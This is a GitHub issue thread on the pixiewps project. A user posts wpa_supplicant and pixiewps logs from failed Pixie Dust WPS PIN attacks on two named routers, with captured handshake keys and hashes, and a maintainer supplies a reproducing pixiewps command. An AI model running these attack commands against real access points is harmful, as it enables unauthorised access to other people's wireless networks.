search

wiire-a / pixiewps

An offline Wi-Fi Protected Setup brute-force utility
Other
1.55k stars 310 forks source link

Help #116

Closed MohamedWn closed 1 week ago

MohamedWn commented 1 week ago

hi , i m always stucking like this in all models of this router : it grubs all needed sata but won't crack it .

[] Running wpa_supplicant… [] Running wpa_supplicant… [] Trying PIN '12345670'… [] Scanning… [] Associating with AP… [+] Associated with 34:E8:94:C0:91:70 (ESSID: TT-MBK) [] Scanning… [] Associating with AP… [+] Associated with 34:E8:94:C0:91:70 (ESSID: TT-MBK) [] Sending EAPOL Start… [] Received Identity Request [] Sending Identity Response… [] Received WPS Message M1 [P] E-Nonce: 338158F970F85DD941D98B803155A246 [] Sending WPS Message M2… [P] PKR: 69614D1C3A3F7D1CC78B297F7DAA40630E2A7A580C6DD3FDED8FF9B3FE47BA6B746B34F73E68540B832157A5E047FE37FDC67572306407EA299D74D75C1BBEA9EC6A50E2BFC41F6CEEFCF1D9C40BF232E0FE68CEFFE8B2E96C85BFB5803C6A428FE007511BE69518CD9E8087D144C06BBD0267972F98A9DC762B62421CF113719BD1CB65D65EEEF0ECBC6E8436EA4DDA9C98389F17F84E6ED11EE566EF71644645CA3C3F34A8F2523C3AF72818452893C23D602B88EAF15F6ECEF5C3E69892F3 [P] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B [P] AuthKey: 4F9DB5A924D5A7E1891A2B4850FFDAC8D568A3DEB747A2A5F88A79D11FFEDDE3 [*] Received WSC NACK [-] Error: wrong PIN code [!] Not enough data to run Pixie Dust attack

rofl0r commented 1 week ago

you lack e-hash1 and e-hash2

rofl0r commented 1 week ago

reproducer:

pixiewps -r 69614D1C3A3F7D1CC78B297F7DAA40630E2A7A580C6DD3FDED8FF9B3FE47BA6B746B34F73E68540B832157A5E047FE37FDC67572306407EA299D74D75C1BBEA9EC6A50E2BFC41F6CEEFCF1D9C40BF232E0FE68CEFFE8B2E96C85BFB5803C6A428FE007511BE69518CD9E8087D144C06BBD0267972F98A9DC762B62421CF113719BD1CB65D65EEEF0ECBC6E8436EA4DDA9C98389F17F84E6ED11EE566EF71644645CA3C3F34A8F2523C3AF72818452893C23D602B88EAF15F6ECEF5C3E69892F3 -e D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B -n 338158F970F85DD941D98B803155A246 -a 4F9DB5A924D5A7E1891A2B4850FFDAC8D568A3DEB747A2A5F88A79D11FFEDDE3
MohamedWn commented 1 week ago

reproducer:

pixiewps -r 69614D1C3A3F7D1CC78B297F7DAA40630E2A7A580C6DD3FDED8FF9B3FE47BA6B746B34F73E68540B832157A5E047FE37FDC67572306407EA299D74D75C1BBEA9EC6A50E2BFC41F6CEEFCF1D9C40BF232E0FE68CEFFE8B2E96C85BFB5803C6A428FE007511BE69518CD9E8087D144C06BBD0267972F98A9DC762B62421CF113719BD1CB65D65EEEF0ECBC6E8436EA4DDA9C98389F17F84E6ED11EE566EF71644645CA3C3F34A8F2523C3AF72818452893C23D602B88EAF15F6ECEF5C3E69892F3 -e D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B -n 338158F970F85DD941D98B803155A246 -a 4F9DB5A924D5A7E1891A2B4850FFDAC8D568A3DEB747A2A5F88A79D11FFEDDE3

sorry but in this exemple it can get e-h1 and e-h2 like this : Running wpa_supplicant… [] Running wpa_supplicant… [] Trying PIN '12345670'… [] Scanning… [] Associating with AP… [] Scanning… [] Associating with AP… [+] Associated with B4:B0:24:23:68:A0 (ESSID: TOPNET_68A0) [] Sending EAPOL Start… [] Received Identity Request [] Sending Identity Response… [] Received WPS Message M1 [P] E-Nonce: 77B626BE57A9C15849D4A55E27B4E430 [] Sending WPS Message M2… [P] PKR: 5B4F776EE18CCD28FAD13F750ECDFB5DDEF380F4B779CEF963470AAE687AB23705747359F41291BF6C0E64BABD91234800ACCBD57F3AE288924D0538078D35FD5D1C20F36360F3B46EB707A7EC677A7B4502DB9DA26F2262286DCD67CCF1CB8B85D628C1848804DDACDAB24FB801580CA6D9F63B83F6DB6D9DF1E1BBB94B1B881FB29C2A31E8C3D587166426D0857B17A854C2DD33410D3AA7DBFF4E5F1A5D2E5137EA8DA78492FBD2614B1DE955E3FA3EF8F56F41E51BDECE81C5F6EC808335 [P] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B [P] AuthKey: 34E63BA461FBAC92ACE3BF0FD5BCBE3EE2226159418587DBA1A0FA4652BF88F8 [] Received WPS Message M3 [P] E-Hash1: 98730E0DF0BAA33B797D2CEC7B52501886D94DB1F71CA44399EE053688A3CAC1 [P] E-Hash2: 3EFFA839717416AA97AE1502E70608E5B4AA7938659EC19C7F486B8F821B2D05 [] Sending WPS Message M4… [] Received WSC NACK [-] Error: wrong PIN code [*] Running Pixiewps… pixiewps --pke D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B --pkr 5B4F776EE18CCD28FAD13F750ECDFB5DDEF380F4B779CEF963470AAE687AB23705747359F41291BF6C0E64BABD91234800ACCBD57F3AE288924D0538078D35FD5D1C20F36360F3B46EB707A7EC677A7B4502DB9DA26F2262286DCD67CCF1CB8B85D628C1848804DDACDAB24FB801580CA6D9F63B83F6DB6D9DF1E1BBB94B1B881FB29C2A31E8C3D587166426D0857B17A854C2DD33410D3AA7DBFF4E5F1A5D2E5137EA8DA78492FBD2614B1DE955E3FA3EF8F56F41E51BDECE81C5F6EC808335 --e-hash1 98730E0DF0BAA33B797D2CEC7B52501886D94DB1F71CA44399EE053688A3CAC1 --e-hash2 3EFFA839717416AA97AE1502E70608E5B4AA7938659EC19C7F486B8F821B2D05 --authkey 34E63BA461FBAC92ACE3BF0FD5BCBE3EE2226159418587DBA1A0FA4652BF88F8 --e-nonce 77B626BE57A9C15849D4A55E27B4E430

Pixiewps 1.4

[-] WPS pin not found!

[*] Time taken: 0 s 70 ms

[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

rofl0r commented 1 week ago

that just means that either the AP isn't vulnerable, or nobody has figured out yet why it doesn't work with that (or similar) models/fw combinations. bad luck.